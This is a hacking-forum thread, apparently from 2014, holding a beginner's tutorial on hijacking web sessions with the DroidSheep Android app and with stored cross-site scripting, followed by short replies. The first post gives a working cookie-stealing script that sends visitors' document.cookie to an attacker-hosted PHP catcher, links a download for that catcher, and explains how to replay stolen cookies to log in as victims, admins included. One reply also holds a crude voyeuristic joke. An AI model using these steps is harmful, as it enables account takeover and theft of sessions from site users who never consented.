Login Register






The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.
Thread Rating:
  • 0 Vote(s) - 0 Average


Session hijacking via ARP-Spoofing and XSS filter_list
Author
Message
Session hijacking via ARP-Spoofing and XSS #1
Hello! This is my first tutorial so please do not flame me. So I found a cool useful tool to make your life easier if you like session hijacking, and what makes it even cooler is that it is for android phones and tablets(Rooted device is required ).
[Step 1]
So google for droid sheep and look for the apk
[Image: droid.PNG]

[Step 2]
Its pretty easy from there, you just download run it and it should install then you should definitely be able to go from there. Also you have to be connected to your victims network to use this.
[Image: images+(5).jpg]

XSS Session hijacking
----------------------------------------------------------------------------------------------------------------------------

First you need find something that is vulnerable to XSS(obviously), then you need make sure other people can go to the XSS vulnerable place, this will work in places with something like forums or a comment system.
[Step 1]
So to test the website for the vulnerability put some javascript in the input that will alert a message, to do this post <script>alert('XSS');</script> in the vulnerable input.
[Image: images+(6).jpg]

[Step 2]
If you get an alert from the page then it is vulnerable.
[Image: IC65255.gif]

[Step 3]
Since the code executed into the website then when people go to the post then the code will run the <script>alert('XSS')</script> and then they get an alert. So now what you want to do is run malicious code that steels there session ID's and sends it too you so you can then open it in and be logged in as them. There is a lot of ways to do this. This is how I usually do it. First you need to go to a free hosting service where you can use php like this free one http://www.110mb.com/. Then upload Cookie Catcher to your website. Download from here http://adf.ly/Tdbm

[Step 4]
Post this in the vulnerable input on victims website <script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script> (make sure to make the location to the website you made)and whenever a user goes to the vulnerable forum there cookies will go to a file in your directory called cookiecatcher.html. Open that and it should have the cookies from the users that have visited.


[Step 5]
To log in go to the vulnerable website and replace the url with this Javascript:void(document.cookie="") (Replace "" with the stolen cookie)and it should go to the session containing that cookie which will have them logged and there you go! Your in and if you get the admins session then you can usually mess with everyones account registered with that website.



I hope it helped, I also used one of @1234hotmaster's post has a reference. Again this is my first tutorial so please do not flame me. Thanks!:Content: Also if anyone has tips, advice, or suggestions on how to write tutorials I would love that

Reply

RE: Session hijacking via ARP-Spoofing and XSS #2
Honestly not bad for a first attempt. A few tips though try to keep the text consistent for example you wrote the [step] header in several different colors when you should keep them all the same color (perhaps use some formating options as well such as text size bold or underline and for the reference you should @ mention the user.

The use of images is a nice touch and helps keep things clear.
If you need help feel free to PM me
[Image: klfpJD]
Probitcoin
Freebitcoin
BTC clicks
bitcoin wallet:
1FBPAanbs3rJU9BUpobpDJc9hHUaCaC25N

Reply

RE: Session hijacking via ARP-Spoofing and XSS #3
(02-01-2014, 02:01 AM)chmod Wrote: Honestly not bad for a first attempt. A few tips though try to keep the text consistent for example you wrote the [step] header in several different colors when you should keep them all the same color (perhaps use some formating options as well such as text size bold or underline and for the reference you should @ mention the user.

The use of images is a nice touch and helps keep things clear.

Thanks! I will make sure to use the advice.:Thumbs-Up:

Reply

RE: Session hijacking via ARP-Spoofing and XSS #4
I use the Greasemonkey addon with firefox and add the cookie injector script to do as the name says Smile those are useful and fun. i loooove me some cookies hahaha but as you said bruhh...just a thought Biggrin
[username], can you please open the curtain a little bit? I can't see inside from the bushes :/ Thank you!

Reply







Users browsing this thread: 1 Guest(s)